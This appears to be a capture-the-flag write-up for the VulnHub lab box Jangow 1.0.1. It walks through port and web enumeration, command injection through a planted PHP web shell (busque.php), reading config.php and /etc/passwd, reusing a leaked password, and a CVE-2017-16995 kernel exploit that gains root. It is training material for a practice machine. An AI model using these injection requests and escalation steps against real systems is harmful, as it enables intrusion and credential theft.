Description: This is a write-up of the Jangow 1.0.1 CTF in VulnHub. This is an easy box, in which I'll cover how I got the root flag using HTTP RCE and Privilege Escalation
Footprinting
Open ports
I looked for open ports using Nmap:
kali@kali:~$ mkdir nmap
kali@kali:~$ sudo nmap -v3 -O -sS -p- -Pn -oA nmap/syn_full 192.168.56.118
Scanning 192.168.56.118 [65535 ports]
Discovered open port 21/tcp on 192.168.56.118
Discovered open port 80/tcp on 192.168.56.118
Ports 21
(FTP) and 80
(HTTP) are opened (ports list)
Scanning for vulnerabilities in these ports shows nothing really interesting:
kali@kali:~$ nmap -v3 -p21,80 -sC -sV -oA nmap/vuln 192.168.56.118
kali@kali:~$ cat nmap/vuln.nmap
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 255 vsftpd 3.0.3
80/tcp open http syn-ack ttl 255 Apache httpd 2.4.18
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-06-10 18:05 site/
|_
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Index of /
HTTP
Enumeration
Let's enumerate the resources of the website using dirb
:
kali@kali:~$ dirb http://192.168.56.118/ /usr/share/wordlists/dirb/common.txt -o dirb.txt
kali@kali:~$ cat dirb.txt
---- Scanning URL: http://192.168.56.118/ ----
+ http://192.168.56.118/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.118/site/
---- Entering directory: http://192.168.56.118/site/ ----
==> DIRECTORY: http://192.168.56.118/site/assets/
==> DIRECTORY: http://192.168.56.118/site/css/
+ http://192.168.56.118/site/index.html (CODE:200|SIZE:10190)
==> DIRECTORY: http://192.168.56.118/site/js/
==> DIRECTORY: http://192.168.56.118/site/wordpress/
---- Entering directory: http://192.168.56.118/site/assets/ ----
---- Entering directory: http://192.168.56.118/site/css/ ----
---- Entering directory: http://192.168.56.118/site/js/ ----
---- Entering directory: http://192.168.56.118/site/wordpress/ ----
When navigating in the website, I saw a page called busque.php
:
http://192.168.56.118/site/busque.php?buscar=
After a lot of trials and errors, the next enumeration gave me some hints:
kali@kali:~$ sudo apt install seclists
kali@kali:~$ while read l; do
echo $l;
curl "http://192.168.56.118/site/busque.php?buscar=$l" >> buscar.txt;
done < /usr/share/seclists/Fuzzing/1-4_all_letters_a-z.txt
Basically, this loop fuzzes every line of the 1-4_all_letters_a-z.txt
wordlist in the busque
parameter, and appends each output in the file busque.txt
:
kali@kali:~$ less buscar.txt
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
Filesystem 1K-blocks Used Available Use% Mounted on
udev 488968 0 488968 0% /dev
tmpfs 101628 3192 98436 4% /run
/dev/sda1 11221232 2095112 8533072 20% /
tmpfs 508136 0 508136 0% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 508136 0 508136 0% /sys/fs/cgroup
8 ./js
20 ./wordpress
1100 ./assets/img
1128 ./assets
208 ./css
1388 .
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Usage: iw [options] command
Options:
--debug enable netlink debugging
--version show version (3.17)
Commands:
...
Oh ?! This output sounds familiar !
Usage: iw [options] command
Options:
--debug enable netlink debugging
--version show version (3.17)
Commands:
...
It's the manual of a command called iw
.
OS command execution
You probably guessed it ! We have access to a shell on the web server using the buscar
GET parameter:
>>>
GET /site/busque.php?buscar=ls+-a HTTP/1.1
Host: 192.168.56.118
<<<
.
..
assets
busque.php
css
index.html
js
wordpress
We can use this simple Python script to automate the OS command injections through the URL.
Indeed, the content of busque.php
is:
>>>
GET /site/busque.php?buscar=cat+busque.php HTTP/1.1
Host: 192.168.56.118
<<<
<?php system($_GET['buscar']); ?>
In the wordpress
directory, there is a configuration file:
>>>
GET /site/busque.php?buscar=ls+wordpress HTTP/1.1
Host: 192.168.56.118
<<<
config.php
index.html
And it contains a password !
>>>
GET /site/busque.php?buscar=cat+wordpress/config.php HTTP/1.1
Host: 192.168.56.118
<<<
<?php
$servername = "localhost";
$database = "desafio02";
$username = "desafio02";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);
?>
FTP
Let's try these credentials in FTP :
kali@kali:~$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:kali): desafio02
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
Ok, it failed :/
Local privilege escalation
user.txt
Actually, this password is the one of jangow01
, where the credentials are jangow01:abygurl69
. Thus, we can switch to the jangow's virtual machine and fill the login prompt.
In jangow01
's home directory, we got the user flag :-]
jangow01@jangow01:~$ cat /home/jangow01/user.txt
d4[...]7e
Are there other users registered in the web server ?
>>>
GET /site/busque.php?buscar=grep+sh$+/etc/passwd HTTP/1.1
Host: 192.168.56.118
<<<
root:x:0:0:root:/root:/bin/bash
jangow01:x:1000:1000:desafio02,,,:/home/jangow01:/bin/bash
Nope (other than root
). So we wanna escalate from jangow01
to root
.
proof.txt
Looking at kernel's information, lots of exploits exist:
jangow01@jangow01:~$ uname -a
Ubuntu 16.04, kernel 4.4.0-31
After trials and errors this one worked. I compiled the exploit in the machine, and executed it:
More details here.
jangow01@jangow01:~$ gcc ./cve-2017-16995.c -o ./cve-2017-16995
jangow01@jangow01:~$ chmod +x ./cve-2017-16995
jangow01@jangow01:~$ ./cve-2017-16995
Finally, we can read the root
flag !
$ whoami
root
$ ls /root
proof.txt
$ cat /root/proof.txt
@@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&
@ @@@@@@@@@@@@@@@&# #@@@@@@@@&(. /&@@@@@@@@@@
@ @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@& .&@@@@@
@ @@@@@@@& @@@@@@&@@@@@&%######%&@* ./@@* &@@
@ @@@@@* (@@@@@@@@@#/. .*@. .#&. &@@@&&
@ @@@, /@@@@@@@@#, .@. ,&, @@&&
@ @& @@@@@@@@#. @@@,@@@/ %. #, %@&
@@@# @@@@@@@@/ .@@@@@@@@@@ * ., @@
@@& @@@@@@@@* @@@@@@@@@@@ , @
@& .@@@@@@@( @@@@@@@@@@@@@@@@@@@@@ *. &@
@@/ *@@@@@@@/ @@@@@@@@@@@# @@
@@ .@@@@@@@/ @@@@@@@@@@@@@ @# @@
@@ @@@@@@@@. @@@@@@@@@@@ @@( @@
@& .@@@@@@@@. , @@@@@@@ * .@@@*( .@
@@ ,@@@@@@@@, @@@@@@@@@&*%@@@@@@@@@, @@@@@(%&* &@
@@& @@@@@@@@@@@@@@@@@ (@@@@@@@@@@@@@@%@@/ &@
@ @& ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%* &@
@ @@. .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%* &@&
@ @@@& ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/ &@@&&
@ @@@@@@. *%@@@@@@@@@@@@@@@@@@@@&#/. &@@@@&&
@ @@@@@@@@& JANGOW &@@@
@ &&&&&&&&&@@@& @@(&@ @. %.@ @@%@ &@@@&&&&
&&&@@@@&% &/ (&&@@@&&&
(((((((((((((((((((((((((((((
da[...]09